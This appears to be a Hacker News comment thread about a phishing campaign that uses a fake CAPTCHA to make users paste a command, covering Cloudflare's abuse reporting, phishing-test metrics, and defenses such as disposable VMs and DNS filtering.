Comment by johnklos

Comment by johnklos 10 months ago

12 replies

View on Hacker News

Can be summarized with: Don't click on links in email.

So is github-scanner.com (and github-scanner.shop) still the same malicious party? It seems to be. Funny that their DNS is hosted by Cloudflare (who, famously, don't host anything, because they think we're all dumb). Cloudflare, who take responsibility for nothing, has no way to report this kind of abuse to them.

The domain which hosts the malware, 2x.si, both uses Cloudflare for DNS and is hosted by Cloudflare. At least it's possible to report this to Cloudflare, even though they rate limit humans and have CAPTCHAs on their abuse reporting forms.

Sigh. Thanks to Cloudflare, it's trivial these days to host phishing and malware.

poincaredisk 10 months ago

Cloudflare is way more responsive to abuse requests than 95% of country level DNS registrars. Having experience working with both.

Reply View 1 reply
elashri 10 months ago

I don't know how effective and quick to respond but there is a way to report malware [1]

Extracting from the page

> Which category of abuse to select > Phishing & Malware

https://www.cloudflare.com/trust-hub/reporting-abuse/

Reply View 2 replies
  • johnklos 10 months ago

    Cloudflare's abuse form will not let you submit the report if you don't include a URL that currently points to their network. There're no options for phishing / scam domains for which they're the registrar and/or DNS hosting.

    Reply View 1 reply
    • ToValueFunfetti 10 months ago

      I haven't tested the form, but they do claim you can report abuse of the registrar with some of the options, perhaps they've changed it?

      Failing that:

      > If Cloudflare is listed as the registrar on an ICANN WHOIS listing, you also can email reports related to our registrar services to registrar-abuse@cloudflare.com

      Reply View 0 replies
ipdashc 10 months ago

> Don't click on links in email.

Not saying you're wrong per se, but isn't it more so summarized with "don't fall for a 'CAPTCHA' that requires you to paste code into the window labeled 'This will run with administrative privileges'?"

This is more so a grumble than a serious comment on security, but agh, it's always bugged me that the metric for failing phishing tests is "clicked on any link in the email" and not, you know, entered credentials into the phish site, or downloaded and opened a file. Like, I get it, it's much easier to teach nontechnical users to simply not click bad links than that other stuff - and browser vulns do exist - but it still vaguely annoys me.

I feel like I've seen countless posts like this one that end in the user entering creds, giving the browser some weird permission, downloading some file (sometimes straight-up an executable), or in this case, running a command. I don't know if I've seen a single one that ends in "and then they clicked the link and it popped a browser 0-day and that was the end of that".

Web browsers are a wide attack surface, yes, but they're also... intended for browsing the Internet. Most people click through links pretty haphazardly as they're doing work or researching a topic. Defense in depth and all, but I feel like a security policy that holds "don't visit any evil websites ever" as a core tenet is pretty flawed.

Reply View 0 replies
spoonfeeder006 10 months ago

So how do you not click links to confirm your email for a new account?

Rather one could use Qubes OS and only open links in disposable VMs and never enter info beyond that

Thats basically what I do when I get emails to confirm my email address for a new account

One can't always avoid clicking links can they?

Reply View 4 replies
  • bentcorner 10 months ago

    > So how do you not click links to confirm your email for a new account?

    Fair question, but the "don't click links in email" is for emails that you don't expect. And sure, that's an unsatisfying answer because it's hard to communicate this wisdom to your grandmother.

    I think the best answer is defense-in-depth. Ensure you use updated email clients, browsers, and OS, and employ a dns blocker like a pihole or equivalent public service.

    For less-savvy people a device like an iPad or Chromebook can be a reasonable defense.

    Reply View 3 replies
    • hunter2_ 10 months ago

      If I'm being honest, "don't click links in email unless you were expecting that particular email message" seems easier for grandma than "update x, y, and z, and use Pihole" unless you want to administer her network and devices. But maybe you're saying that an iPad/Chromebook can mitigate all of the above needs? A little bit.

      Anyway, while I haven't heard of any cases yet, it wouldn't surprise me if senders of phishing email someday manage to deliver messages shortly after detecting some traffic (DNS lookup?) that you legitimately make with the entity the email is spoofing. Then you're expecting it, roughly.

      Reply View 2 replies
      • johnklos 10 months ago

        It is a bit easier, at least. My almost 90 year old Mom now knows to be suspicious of email and to not believe email unless she has a reason to think she should be getting it.

        To be fair about setting up a Pihole or some other form of DNS filtering, that's something that the network administrator should do, not individual users. It's a shame that it's still not trivial - companies that make NAT routers resist building in things that they don't completely control, so a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.

        Mom also understands that someone taking over her Nextdoor account would be a nuisance, whereas someone taking over her banking account would be significantly more problematic, so the more important something is, the more time she'll take to ascertain its authenticity.

        I practice explaining these things because I do it often. One interesting observation is that Mom believes me, so she does the things I suggest, whereas younger people think they know better, so they generally don't put much energy in to my suggestions. I'm working on ways of showing people that they're not necessarily safe because they're "doing the same things they've always done, and nothing bad has happened yet".

        Reply View 1 reply
        • hunter2_ 10 months ago

          > a configuration page for Pihole in your NAT router's web interface likely isn't coming soon. I hope that changes.

          In the meantime, the majority of routers do allow you to specify the DNS resolver instead of using whatever it learns via WAN DHCP, so you could put in a filtered public resolver (as opposed to your own Pihole instance) which gives pretty similar results if you don't need to whitelist anything. Plus, you can do the same on mobile devices that roam beyond that router (and avoid VPN through said router). I've been using dns.adguard-dns.com (94.140.14.14 and 94.140.15.15) [0]. They were founded in Moscow but now operate out of Cyprus (EU) and I don't have much of a reason to trust any other DNS operator more than them.

          [0] https://adguard-dns.io/en/public-dns.html -- "method 2"

          Reply View 0 replies